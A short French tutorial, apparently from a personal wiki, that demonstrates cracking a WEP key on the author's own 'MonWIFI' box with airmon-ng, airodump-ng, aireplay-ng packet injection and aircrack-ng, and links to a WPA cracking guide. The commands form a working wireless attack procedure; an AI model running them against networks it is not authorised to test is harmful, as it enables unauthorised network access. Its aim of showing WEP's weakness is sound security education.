Tester la force de chiffrement d'une clé WEP

Il y a bien longtemps que l'on a découvert que les réseau WIFI configurés avec une clé WEP sont aujourd'hui obsolète. N'étant pas responsable de vos actes et ne vous incitant pas à reprendre ma procédure, je montre ici rapidement la faiblesse que cela représente d'utiliser ce type de clé.

Voici le contexte :

Nous avons :

  1. Une machine Debian (Jessie) avec le paquet airodump-ng installé (La distribution Kali fait également l'affaire)
  2. D'une Box Internet avec le SSID MonWIFI sur le channel 11 et d'une clé en 128 bits (ex: 583c63753732253c5b354c762e) configuré

Eventuellement pour se rapprocher du plus possible au vrai réseau local, on peut connecter avec un câble RJ45 un PC qui lit une vidéo de Youtube.

Scanner le réseau

On désigne la carte réseau sans fil :

airmon-ng start wlan0

Puis on lance le monitoring :

airodump-ng mon0 --essid "MonWIFI" -c 11 -w log
S'il vous indique une erreur, peut être que la carte réseau est utilisée par un autre processus. A ce moment là, il faut lancer cette commande :
airmon-ng check kill

Stimuler le réseau (optionnel)

Ceci est un cas particulier, si dans l'interface d'airodump-ng on remarque que le nombre de #Data augmente rapidement alors les commandes suivantes ne sont pas utiles (et surtout détectable!). Les commandes suivantes sont à lancer dans des terminaux différents.

On lance une injection qui va être sollicitée lorsqu'il trouve plusieurs réponses de type ACK :

aireplay-ng -3 -e "MonWIFI" wlan0

Pour que cette injection fonctionne, il faut qu'il y a des interactions sur le réseau. Pourquoi ne pas lancer quelques Handshake ?

aireplay-ng -1 3 -e "MonWIFI" wlan0

Option :

  • -0 : Envoie une désauthentification.
  • -1 : Envoie une authentification.
  • -3 : Récupère les ARP et génère du trafic (Injection)
  • -9 : Test l'injection de paquet sur les AP détectés

Rechercher la clé

Pendant que les précédentes commandes s'exécutent, on peut lancer la commande suivante qui va rechercher en boucle la bonne clé :

aircrack-ng -a 1 -e "MonWIFI" log-*.cap

Au bout de 45 000 IVs soit ~15 minutes, j'obtient la bonne clé.

Pour plus d'informations sur ces commandes je vous conseil grandement ces pages :

Suite : crack wpa : http://www.crack-wifi.com/tutoriel-crack-wpa.php

  • Dernière modification: 2017/06/01 19:50